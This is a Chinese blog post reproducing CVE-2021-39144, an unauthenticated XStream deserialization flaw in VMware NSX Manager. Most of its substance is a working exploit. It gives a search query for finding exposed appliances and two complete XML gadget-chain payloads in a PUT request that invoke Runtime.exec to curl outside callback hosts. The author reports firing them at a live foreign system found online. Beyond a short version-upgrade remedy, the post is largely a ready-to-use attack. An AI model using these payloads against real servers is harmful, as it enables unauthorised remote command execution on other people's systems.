VMware NSX Manager XStream unauthenticated反序列化漏洞 CVE-2021-39144 已亲自复现

已于 2025-02-13 18:03:01 修改
阅读量771 收藏 9
点赞数 9
分类专栏: XStream 文章标签: 网络安全
于 2023-12-26 00:50:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135173328
版权
文章报道了VMwareNSXManager中的XStream反序列化漏洞CVE-2021-39144,攻击者可通过控制输入流执行本地命令。复现环境需线上访问,建议升级至1.4.19版本以修复该漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

VMware NSX Manager XStream unauthenticated 反序列化漏洞 CVE-2021-39144 已亲自复现

漏洞名称

漏洞描述

在Unmarshalling Time处包含用于重新创建前一对象的类型信息。XStream基于这些类型的信息创建新实例。攻击者可以控制输入流并替换或注入对象,这会导致在服务器上执行本地命令。

影响版本

XStream <= 1.4.17

漏洞复现

环境搭建

title="VMware Appliance Management"

找不到线下的环境,国外线上环境测试,访问页面。
在这里插入图片描述

漏洞利用

PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 558

<java.util.PriorityQueue serialization="custom">
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <dynamic-proxy>
            <interface>java.lang.Comparable</interface>
            <handler class="sun.tracing.NullProvider">
                <active>true</active>
                <providerType>java.lang.Comparable</providerType>
                <probes>
                    <entry>
                        <method>
                            <class>java.lang.Comparable</class>
                            <name>compareTo</name>
                            <parameter-types>
                                <class>java.lang.Object</class>
                            </parameter-types>
                        </method>
                        <sun.tracing.dtrace.DTraceProbe>
                            <proxy class="java.lang.Runtime"/>
                            <implementing__method>
                                <class>java.lang.Runtime</class>
                                <name>exec</name>
                                <parameter-types>
                                    <class>java.lang.String</class>
                                </parameter-types>
                            </implementing__method>
                        </sun.tracing.dtrace.DTraceProbe>
                    </entry>
                </probes>
            </handler>
        </dynamic-proxy>
        <string>curl http://hernandez.wagner-jackson.martin-barnes.com</string>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

在这里插入图片描述
查看DNS Log成功获取命令执行结果,如图:
在这里插入图片描述
测试到此为止,线上环境。其余payload自行测试。

payloa2

Content-Type: application/xml

<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Comparable</providerType>
<probes>
<entry>
<method>
<class>java.lang.Comparable</class>
<name>compareTo</name>
<parameter-types>
<class>java.lang.Object</class>
</parameter-types>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='java.lang.Runtime'/>
<implementing__method>
<class>java.lang.Runtime</class>
<name>exec</name>
<parameter-types>
<class>java.lang.String</class>
</parameter-types>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</handler>
</dynamic-proxy>
<string>curl http://2345.mjo1hm.ceye.io</string>
</java.util.PriorityQueue>
</java.util.PriorityQueue>

修复建议

XStream 任意代码执行漏洞—关注厂商的主页以获取最新版本1.4.19
补丁链接:https://x-stream.github.io/download.html

总结

如果攻击成功,在响应头中返回的状态码为400,响应体无回显。

Web日志安全分析技巧
06-24 3715
ox01 Web日志Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还...
【WEB安全】Xstream最新反序列化poc执行报错问题
hhhhhggghbhh的博客
12-13 697
最近有个需求,用Xstream反序列化打个内存马,从通用性来讲,肯定用1.4.17的洞去打应用范围最广。众所周知,Xstream官方会提供其漏洞的poc。在我实验之下,1.4.17的几个poc只要涉及到任意java代码执行的都会报错,纯调用java.lang.Runtime.exec()的却不会报错。在我调试之下发现了其奥秘,本文就是解决Xstream任意java代码执行报错的问题。
VMware NSX Manager XStream unauthenticated反序列化漏洞 CVE-2024-39144 已亲自复现
04-15 919
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CVE-2021-4034
最新发布
Dikesi的博客
02-09 908
Linux Polkit 权限提升漏洞
Xstream反序列化分析(CVE-2021-39149)
zkaqlaoniao的博客
01-04 1164
前几个月XStream爆出一堆漏洞,这两天翻了翻,发现这波洞应该是黑名单绕过的最后一波了。因为在最新版的XStream 1.4.18中已经默认开启白名单的安全框架,按照XStream官方补漏洞的习惯,应该不会再接受新的绕过黑名单的漏洞了。
近两年常用的RCE漏洞收集
Websec
04-11 5705
1、Spring Cloud RCE CVE-2022-22965 https://github.com/fullhunt/spring4shell-scan log4j漏洞: https://github.com/fullhunt/log4j-scan/blob/master/log4j-scan.py 2、weblogic反序列化 WeblogicScan:https://github.com/rabbitmask/WeblogicScan 3、shiro反序列化 shiroExploit:https:
python爬虫爬美女图片:“小甲鱼056节轮一只爬虫的自我修养4:OOXX” 最终更新2021.6.27日,更新后可用!!!
Alocus的博客
10-25 8795
需要改动有两个方面: 第一方面,网址编码有变化,如http://jandan.net/ooxx/MjAyMDEwMjUtODY=#comments,尾部的为base64编码,在网址构造时对应处使用base64编码.即可。 第二方面,图片地址发生了小改变,只需要将图片地址加入列表时,增加 http:即可。 代码如下 import urllib.request import os import base64 def url_open(url): opener = urllib.req...
紧急通告VMware vCenter高危漏洞CVE-2024-38812和CVE-2024-38813修复方案
我在Citrix、VMware、Veeam、微软和NVIDIA等领域拥有丰富经验的专业人士,专注于设计和维护虚拟化基础设施、实施备份与灾难恢复策略,致力于优化企业的IT环境。
09-19 1806
紧急通告VMware vCenter高危漏洞CVE-2024-38812和CVE-2024-38813修复方案
NSX 6.3.5 VMware-NSX-Manager-6.3.5-7119875.ova
07-29
由于文件太大,该下载附件内附的是百度云盘的下载地址 里面包含nsx 6.3.5的安装包和安装文档,一站式安装
VMware-NSX-Manager-6.4.0-7564187.ova
06-27
VMware-NSX-Manager-6.4.0-7564187.ova BT种子地址。最新版本NSX for vsphere下载
VMware NSX-T 3.0 OVA文件nsx-unified-appliance-3.0.0.0.0.15946739.ova
10-13
VMware NSX-T 3.0 OVA文件nsx-unified-appliance-3.0.0.0.0.15946739.ova
VMware NSX原理与实践----NSX防火墙详解(一).txt
02-22
VMware NSX原理与实践----NSX防火墙详解(一) 该文档清楚的讲解了NSX防火墙的原理、架构、功能等等,可以帮助新手最快地上手,有利于初学者能够在最短的时间内对NSX 防火墙的学习有一个长足的进步
java XStream更新
编程技术提升
03-29 3397
漏洞详情 XStream 是一个常用的 Java 对象和 XML 相互转换的工具。近日 XStream 官方发布安全更新,修复了高危和严重漏洞如下: Version 1.4.17 CVE-2021-39139 任意代码执行漏洞 CVE-2021-39140 可能导致拒绝服务 CVE-2021-39141 任意代码执行漏洞 CVE-2021-39144 远程命令执行漏洞 CVE-2021-39145 任意代码执行漏洞 CVE-2021-39146 任意代码执行漏洞 CVE-2021-39147 任意代码执行漏
XStream < 1.4.20 栈缓冲区溢出漏洞
OSCS开源安全社区
12-29 2464
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。XStream 是一个轻量级的、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。在使用集合和映射的哈希码来实现强制递归哈希计算时,远程攻击者可以通过栈缓冲区溢出的错误来终止应用程序造成拒绝服务攻击。在1.4.20之前的版本中存在栈缓冲区溢出漏洞,从而导致通过操纵已处理的输入流来造成拒绝服务。该漏洞已存在 POC。
腾讯蓝军安全通告:XStream修复14个安全漏洞
Tencent_SRC的博客
08-23 1216
文|腾讯蓝军1. 漏洞概述近日XStream官方发布重要安全更新,修复了14个安全漏洞,其中5个严重漏洞由TSRC向XStream官方报告,通过这些漏洞,攻击者构造特定的XML数据,可...
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 6065
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
SUSE OpenStack与VMWare NSX-T集成实例解析
标题中提到的“SUSE OpenStack Cloud”和“VMWare NSX-T”是两个在现代企业级IT环境中非常重要的技术。在深入理解这两个技术如何集成之前,首先需要对它们各自有一个基本的认识。 SUSE OpenStack Cloud是一个基于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值